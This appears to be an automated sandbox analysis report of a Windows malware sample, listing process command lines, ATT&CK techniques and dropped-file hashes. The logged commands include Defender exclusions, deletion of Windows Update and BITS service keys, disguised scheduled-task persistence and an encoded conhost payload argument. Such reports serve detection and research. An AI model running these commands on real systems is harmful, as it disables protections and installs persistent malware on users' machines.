schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Default\Music\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4436

C:\Program Files\Google\Chrome\updaterload.exe
"C:\Program Files\Google\Chrome\updaterload.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#jjwhcvemx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1996

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4548

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:2736

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:3512

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe nygibdwsbqcm
2⤵
PID:4016

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe exokbvtqyjcxqmff 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
2⤵
- Modifies data under HKEY_USERS
PID:2868

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
1⤵
PID:3248

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:4740

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1⤵
PID:4412

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
PID:4488

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
1⤵
PID:1800

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1⤵
PID:2340

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:5072

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
PID:4912

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:2172

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:1592

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
PID:4216

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1704

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:3908

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:2184

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
- Drops file in Program Files directory
PID:4540

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
1⤵
PID:4116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updaterload.exe
Filesize
4.0MB

MD5
a33f705aa850763e517e7b99bbc01f54

SHA1
65ee9bb2b2dd7cff49af1fccc5334d7f932b03ab

SHA256
b2495abcef9b5b6bea0310f19c29d36b0b20e87d605655576e8f06ab0f33ea80

SHA512
49225d47568a9a62d5a73c8aff4f69cd80bdc878e50fbb4cebb2dc11e14da2242c157883adaa775749bba4d934f62bdcb0ababd52824734dcf54dd01cd794aa6

Download Submit
C:\Program Files\Google\Chrome\updaterload.exe
Filesize
4.0MB

MD5
a33f705aa850763e517e7b99bbc01f54

SHA1
65ee9bb2b2dd7cff49af1fccc5334d7f932b03ab

SHA256
b2495abcef9b5b6bea0310f19c29d36b0b20e87d605655576e8f06ab0f33ea80

SHA512
49225d47568a9a62d5a73c8aff4f69cd80bdc878e50fbb4cebb2dc11e14da2242c157883adaa775749bba4d934f62bdcb0ababd52824734dcf54dd01cd794aa6

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Recovery\WindowsRE\cmd.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
C:\Recovery\WindowsRE\cmd.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
614f88cf39eb3223246afec4bf1463b4

SHA1
74d738ee6fdada75ac1ef1645073005e3f6b6cfb

SHA256
021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

SHA512
84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2f72663074126629f2131d2a8555fbe5

SHA1
fe2dfa4503b2e516994494acfd0ab037b745dd6d

SHA256
36850f615854b0d5d861a51bac1c1208fcb6b5334853abaa87def8f476fac88d

SHA512
0210d96bb755e8dab99d0a40732fd8d6a8853fe88aacc0469823144c4d7b42cfdca03c959d003f27a2b72b43bb1091d7169659a6599440bb106c25ca2c6ca627

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2f72663074126629f2131d2a8555fbe5

SHA1
fe2dfa4503b2e516994494acfd0ab037b745dd6d

SHA256
36850f615854b0d5d861a51bac1c1208fcb6b5334853abaa87def8f476fac88d

SHA512
0210d96bb755e8dab99d0a40732fd8d6a8853fe88aacc0469823144c4d7b42cfdca03c959d003f27a2b72b43bb1091d7169659a6599440bb106c25ca2c6ca627

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
f8d1e10779edca9a2b936318ac2bcf2a

SHA1
57cf9b3d16e91d3d2c990754f6fea0a129418d60

SHA256
4b6aaf53535365d13334d82ebaea15e3d71c88d71171ee5c0d58961e3126518a

SHA512
013aa3a96d4d1c6bc1bf56aeb36ef855cfb47be1af87727c9afa19c4b048b4ae949cbfc11f204c5b8f2d0911d7145c070293a9fae1de8e5f36eec216e14ebbff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3cd2e5c8dd074b8dbf7ff023276cc171

SHA1
4c554f0ed2c03495523461fe3b4bf0635a4e2942

SHA256
05fa297a8fc6dd7d1ff2b51fa0f7854427665a110e5542196d860a572c32b066

SHA512
0fb3205c64bc2496019971aaa0b0a13805c709712699460280182a0610a8a80070d7400fa2a026893ebbe721ba5a9f41b95e5f0f291139f1796f4e7fb90f59c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3cd2e5c8dd074b8dbf7ff023276cc171

SHA1
4c554f0ed2c03495523461fe3b4bf0635a4e2942

SHA256
05fa297a8fc6dd7d1ff2b51fa0f7854427665a110e5542196d860a572c32b066

SHA512
0fb3205c64bc2496019971aaa0b0a13805c709712699460280182a0610a8a80070d7400fa2a026893ebbe721ba5a9f41b95e5f0f291139f1796f4e7fb90f59c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4ea6c486c88f022a6949ae8ea328f8e6

SHA1
7e2f979d9629549d354c654040e061cdb3c65df4

SHA256
eadd2f4e95597b0f7830619b5fd2aa4e59e7bbdcc1ffd4d97112997a27b49ff7

SHA512
78b837c8fc026b10e86bc502994c89e681730042f3a199802b814b8dfb7a77fb42acceb40fef0b08e282d70ca6aba212ecc973901961581cf133186729ccae23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4ea6c486c88f022a6949ae8ea328f8e6

SHA1
7e2f979d9629549d354c654040e061cdb3c65df4

SHA256
eadd2f4e95597b0f7830619b5fd2aa4e59e7bbdcc1ffd4d97112997a27b49ff7

SHA512
78b837c8fc026b10e86bc502994c89e681730042f3a199802b814b8dfb7a77fb42acceb40fef0b08e282d70ca6aba212ecc973901961581cf133186729ccae23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
7c44a59713865cce6ae4bb520a1fab54

SHA1
d9197f166bcb0a55be3b10907f5cddbfc3b5fd50

SHA256
b1f52fd9b4b0b86c20958b533e590674b1558b64c94fae2d89c6115d27332a89

SHA512
a9df6542e4fe6f259a6704e20e25b70dcefd2877864e4f443ed28e9756e8461ec03014e9ddf0cb84f27fbe5c1046d5c052bed01206f05d5f76341c214141f98e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6112e23b66c7a31a798a79ab9ecc3658

SHA1
2499df1abb3266c9f08c1fca24604fba04b7084d

SHA256
ca4bc262b8a44153c76061b701a267ff1c193ce07037f91fde8f878305cc0adf

SHA512
67e5205ed4a64c3bbba89c6231d17d0f73bda5ac9ad73a67f90c44c7c7340e903eea0f3e7f2019d7564b9e059aa4b5a5571363bf4932ce6fdd02ffe11035ce1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6112e23b66c7a31a798a79ab9ecc3658

SHA1
2499df1abb3266c9f08c1fca24604fba04b7084d

SHA256
ca4bc262b8a44153c76061b701a267ff1c193ce07037f91fde8f878305cc0adf

SHA512
67e5205ed4a64c3bbba89c6231d17d0f73bda5ac9ad73a67f90c44c7c7340e903eea0f3e7f2019d7564b9e059aa4b5a5571363bf4932ce6fdd02ffe11035ce1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
bd4a35c61e4d54a0daffa8519dd944ff

SHA1
48c97d4820c975e6ccefca76c1d5c21816b0622f

SHA256
41b9ac79e022f91b550fb50c5e2b0b42322ff2472ea376e9dd77a0cd535e9d18

SHA512
30df3fb9b141c71ff45f11cdd9b2f7d815f6fbaee07cd055293ac1479358bb787296f970fbd04e9c909aae65de87e8a44059b09a9bbfb99eaec18fd5ad07e26a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
bd4a35c61e4d54a0daffa8519dd944ff

SHA1
48c97d4820c975e6ccefca76c1d5c21816b0622f

SHA256
41b9ac79e022f91b550fb50c5e2b0b42322ff2472ea376e9dd77a0cd535e9d18

SHA512
30df3fb9b141c71ff45f11cdd9b2f7d815f6fbaee07cd055293ac1479358bb787296f970fbd04e9c909aae65de87e8a44059b09a9bbfb99eaec18fd5ad07e26a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5032e309dfd584cfa3b7c1b12cfdb333

SHA1
492c9c934046b1501f00b8a62c953442cc7376af

SHA256
657f8fd3281cf0a480cc38f05ea9a08c42bf07d31c09512a98369143943993c9

SHA512
f4eace15c616c016c18090722cfe320824788bf2bf5c5cd00b91bb430a760246df2714ea1195a42da6c84718715d90cd7c3677ae6d3c00dc188e0f3f280f549a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9299affc10fe5cf77d42f0a03ac6d69c

SHA1
857b56f690216b80a46be30d158539f85bdb430f

SHA256
3e671f39cda4959d14b6cf5e90b4db645dfeefece7a17dab75067efa88edb6c8

SHA512
807a2b9b6a18d954ff8667753531bab83bd7fef54f0d911b28b3d9578505d85c3d24b67ce5c6da60d8c70d17608f11f5834fe496839f5f012907a55cdeb49ce4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4e433605ba9ed594e1112c0557621e4f

SHA1
54b330603bd8d74d2643f7161a7cc7b684281004

SHA256
be2dc99d97092f2d2191af4a394fbc00feed00591846c44c9b99d25b5b188c0f

SHA512
110a24f7aa7def5b65e0344f1876d277e18d8947ab2d3ef673fc2ef99433a50c53b85f23d44597e34e0e5bf311c7192bb0f80486352252a938ee54d5a087f5f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4e433605ba9ed594e1112c0557621e4f

SHA1
54b330603bd8d74d2643f7161a7cc7b684281004

SHA256
be2dc99d97092f2d2191af4a394fbc00feed00591846c44c9b99d25b5b188c0f

SHA512
110a24f7aa7def5b65e0344f1876d277e18d8947ab2d3ef673fc2ef99433a50c53b85f23d44597e34e0e5bf311c7192bb0f80486352252a938ee54d5a087f5f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b252ea42c3069b92f18af6703e74baa3

SHA1
eec258a782d1e93ca0901c58323ca4acacf6fb09

SHA256
e92ae1eaddc5bb04ccd6d4a6cdf10794394a3da17c503f6ace5299098f3531c3

SHA512
169a322ce11f357b01bf1cc9b7ca69c43cad0f42fbd438f5ce85387f7de2d512cb70cf71ef613aa62095b2f87b8c6afb76c6d0cd2c658b802a2cf2302101c25a

Download Submit
C:\Users\Admin\AppData\Local\Temp\64045c3b-cd12-43e8-a424-e11ec0d0cdbc.vbs
Filesize
481B

MD5
16ecc441e267adbd0c55deece6898581

SHA1
435393eb0a6a22e689d034e2733e787b0da1ad59

SHA256
e51d4d5ea44fee61bb5be83239c139fd21f711e50c4ba8d9b03ca3edd63b7780

SHA512
e48c0c2cfae5bef10ce7a2c81412ba6d91f86572cd752a313ec6f12ec7b5ab397ee3b0c6511bb5def2bf212849ccedc4b757ec97367daf7d5dcc00d7a72610ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\PMuNIsfgyA.bat
Filesize
194B

MD5
1d75ca17545f3bf7afa82568b44c487d

SHA1
91c5d116863f10a9b15203052d97495082592b72

SHA256
6f71750acebac60047a1cfc3a46d09766058d604c0630353887fe0e986ca8820

SHA512
de791b42d689f4549658cf9bc11035192c67aa6e025ff90c20e3f90e96134bdb468d1ad695d2d13083b7808177fc6cb8c78ec5636409831f2eef93506aebff95

Download Submit
C:\Users\Admin\AppData\Local\Temp\b6169fc5-0d62-4235-9609-016ad534c79c.vbs
Filesize
705B

MD5
c7f5efb9bba7ecce0dce75badb673713

SHA1
aadbdb96bb69a4b1e5153d7e9cf617943a0f7109

SHA256
22e870663996e9837e1f4d990b27e5911e2a04b121b93c9094c8781067b13939

SHA512
ff6985b4bad5c5cafed91f1f6ad55ddae7a2e492f2922eea0f5fc268efd9b57b0d5b0549d67ea111151228f7a27b39b52934a314f8ee3517d864e7098b1956f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\checksum.exe
Filesize
2.0MB

MD5
0cd7ce3c5e062150d39687eaaaf97878

SHA1
0824069fa664536934ff2c77cdd88a08498601a4

SHA256
1d9bd6acc0978f7124a054cf949983997257c3d4850b1d8e285d708502f5a095

SHA512
3587a734abe60f2fd43a50739e2e1f5cfa5ef1fe44badd760df95b70ee7dcd401b23fd2b1c6c4f16406b7c1477f3fb2395d026174e264d50acef807c556b76b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\checksum.exe
Filesize
2.0MB

MD5
0cd7ce3c5e062150d39687eaaaf97878

SHA1
0824069fa664536934ff2c77cdd88a08498601a4

SHA256
1d9bd6acc0978f7124a054cf949983997257c3d4850b1d8e285d708502f5a095

SHA512
3587a734abe60f2fd43a50739e2e1f5cfa5ef1fe44badd760df95b70ee7dcd401b23fd2b1c6c4f16406b7c1477f3fb2395d026174e264d50acef807c556b76b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\locemsecurity.exe
Filesize
4.0MB

MD5
7b9e14ff7002ae1cd4379d4e0bd92328

SHA1
dacf6c92c7caa03e64fa15870835aa3c8c9f3797

SHA256
d612dc0be127db5013bfc7c8310e8c27c2b4f738d44e1c6222c7bcd4baece8fe

SHA512
a30cd27bb6a00a5ba868eb39dde1e2005b6517f911a28cf553b51f789d6204102f2f6f4fa8d55cf130ac72c5dd235828079b45c535793fffe2108aad2c52ca60

Download Submit
C:\Users\Admin\AppData\Local\Temp\locemsecurity.exe
Filesize
4.0MB

MD5
7b9e14ff7002ae1cd4379d4e0bd92328

SHA1
dacf6c92c7caa03e64fa15870835aa3c8c9f3797

SHA256
d612dc0be127db5013bfc7c8310e8c27c2b4f738d44e1c6222c7bcd4baece8fe

SHA512
a30cd27bb6a00a5ba868eb39dde1e2005b6517f911a28cf553b51f789d6204102f2f6f4fa8d55cf130ac72c5dd235828079b45c535793fffe2108aad2c52ca60

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
e57f245ed7f24707cb90d7ce5aa4a8bd

SHA1
646eaa181f1bfd2ddf1e1236594ae1a4d30722ef

SHA256
3e1ebcc737f3b2e41308a58990c8a806c58a10bd7517da2293795b8476fb6090

SHA512
f2426a55970afab42c2903bddcb9f2c86df0222734528341fee319d2fafa3d7bc0e78f0634581de3aac503ce790d0d80bb3d667f2287f72002d8d222c294dabc

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
e57f245ed7f24707cb90d7ce5aa4a8bd

SHA1
646eaa181f1bfd2ddf1e1236594ae1a4d30722ef

SHA256
3e1ebcc737f3b2e41308a58990c8a806c58a10bd7517da2293795b8476fb6090

SHA512
f2426a55970afab42c2903bddcb9f2c86df0222734528341fee319d2fafa3d7bc0e78f0634581de3aac503ce790d0d80bb3d667f2287f72002d8d222c294dabc

Download Submit
C:\hypersavesIntoRuntime\kwfdnN25sFO9XG48EjXTqioFlqF9.vbe
Filesize
211B

MD5
43183dd14e863071de40b6e12d3f0d3c

SHA1
c4d84b4bd91b4c91c305ccd3815d6b07f95cf9ff

SHA256
283fd9f8112720fadcf42c088a57ec8ac30cfda2ac23cf8a02ec78e16286b037

SHA512
796630c88bd0ef95bd9dc5624f519c127db989d738c00538144adbe9421f35703fa91f44a4d460dd1033848d67f44c5fd58aea70df45ee8da8b5105bc2e9bea4

Download Submit
C:\hypersavesIntoRuntime\savesinto.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
C:\hypersavesIntoRuntime\savesinto.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
C:\hypersavesIntoRuntime\xWSvEstqqDAQFrAa.bat
Filesize
40B

MD5
77d55137901348fe9db620bba96dce04

SHA1
3ae6bd9fd68ebab445706478fbd2366fe62c6861

SHA256
98c528c1ee001ae918d91b0b4d387d6daebd8b75bc75a1cc1cdb7a5e9fe73ce3

SHA512
d5c2ed17dceef6d599b06afcef86bce080192ec16c9350405c895db79f5d04a718460427bbe63276a0a2cf4e5904424bdff291baa94b8d6ac3bd07b17c7b2205

Download Submit
memory/844-142-0x0000000000000000-mapping.dmp

Download
memory/1204-253-0x0000000000000000-mapping.dmp

Download
memory/1444-165-0x0000000000000000-mapping.dmp

Download
memory/1444-183-0x00007FF99CC40000-0x00007FF99D701000-memory.dmp

Filesize
10.8MB

Download
memory/1444-211-0x00007FF99CC40000-0x00007FF99D701000-memory.dmp

Filesize
10.8MB

Download
memory/1528-234-0x0000000000000000-mapping.dmp

Download
memory/1592-278-0x0000000000000000-mapping.dmp

Download
memory/1628-132-0x00000000006E0000-0x000000000070E000-memory.dmp

Filesize
184KB

Download
memory/1628-133-0x00007FF99C930000-0x00007FF99D3F1000-memory.dmp

Filesize
10.8MB

Download
memory/1628-135-0x00007FF99C930000-0x00007FF99D3F1000-memory.dmp

Filesize
10.8MB

Download
